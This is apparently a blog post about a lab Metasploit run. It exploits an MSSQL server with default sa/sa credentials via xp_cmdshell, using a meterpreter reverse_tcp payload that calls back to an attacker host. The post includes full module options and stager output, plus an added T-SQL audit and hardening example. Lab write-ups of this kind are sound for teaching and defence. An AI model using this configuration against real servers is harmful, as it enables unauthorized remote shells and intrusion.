Running a Metasploit experiment on Kali; the steps are as follows:

msf5 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD             sa               no        The password for the specified username
   RHOSTS               192.168.0.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL for incoming connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.22     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/mssql/mssql_payload) > exploit

[*] Started reverse TCP handler on 192.168.0.22:4444
[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...
[*] 192.168.0.20:1433 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 5.86% done (5996/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 7.33% done (7495/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 8.80% done (8994/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 10.26% done (10493/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 11.73% done (11992/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 13.19% done (13491/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 14.66% done (14990/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 16.13% done (16489/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 17.59% done (17988/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 19.06% done (19487/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 20.53% done (20986/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 21.99% done (22485/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 23.46% done (23984/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 24.92% done (25483/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 26.39% done (26982/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 27.86% done (28481/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 29.32% done (29980/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 30.79% done (31479/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 32.25% done (32978/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 33.72% done (34477/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 35.19% done (35976/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 36.65% done (37475/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 38.12% done (38974/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 39.58% done (40473/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 41.05% done (41972/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 42.52% done (43471/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 43.98% done (44970/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 45.45% done (46469/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 46.91% done (47968/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 48.38% done (49467/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 49.85% done (50966/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 51.31% done (52465/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 52.78% done (53964/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 54.24% done (55463/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 55.71% done (56962/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 57.18% done (58461/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 58.64% done (59960/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 60.11% done (61459/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 61.58% done (62958/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 63.04% done (64457/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 64.51% done (65956/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 65.97% done (67455/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 67.44% done (68954/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 68.91% done (70453/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 70.37% done (71952/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 71.84% done (73451/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 73.30% done (74950/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 74.77% done (76449/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 76.24% done (77948/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 77.70% done (79447/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 79.17% done (80946/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 80.63% done (82445/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 82.10% done (83944/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 83.57% done (85443/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 85.03% done (86942/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 86.50% done (88441/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 87.96% done (89940/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 89.43% done (91439/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 90.90% done (92938/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 92.36% done (94437/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 93.83% done (95936/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 95.29% done (97435/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/mssql/mssql_payload) >

The frustrating part is the last line:

Exploit completed, but no session was created.

After running the usual three moves, no shell came back. I tried many approaches: changing the target OS, changing the Metasploit version; no matter how much I fiddled with it, nothing worked. In the end I found the answer in a book: the target has to be the English version of Windows XP SP2. Important things get said three times: "English version", "English version", "English version".
After switching, it did indeed return a shell. As for other systems, especially Chinese-language editions, I don't know how to make it work.
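Added here as an editor's example (not from the original post or the module's own code): a T-SQL audit of the two preconditions this run relies on, the sa/sa credential and xp_cmdshell (note the log line "The server may have xp_cmdshell disabled, trying to enable it"), followed by the matching remediation. It assumes a SQL Server 2005 or later instance and a sysadmin connection; nothing in it comes from the lab machine.

```sql
-- Added audit/hardening example (not from the original post). Assumes SQL Server 2005+
-- (sys.configurations, sys.sql_logins) and that it is run as a sysadmin.

-- 1. Is xp_cmdshell currently enabled? The module turned it on via sp_configure,
--    which only works because the login it used had sysadmin-level rights.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Is the built-in sa login still enabled, and is the password policy enforced?
--    With USERNAME=sa / PASSWORD=sa in the module options, this default credential,
--    not a software bug, is the real precondition for the whole exploit path.
SELECT name, is_disabled, is_policy_checked
FROM sys.sql_logins
WHERE name = 'sa';

-- 3. Every sp_configure change is written to the SQL Server error log, so an
--    unexpected "xp_cmdshell changed from 0 to 1" is visible there after the fact
--    (argument 0 = current log, 1 = SQL Server log, then the search string).
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 4. Remediation: switch xp_cmdshell back off and disable the sa login.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;  RECONFIGURE;
ALTER LOGIN sa DISABLE;
```

With xp_cmdshell off and sa disabled, the module's command stager has no way to write or run its payload even if it reaches port 1433.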
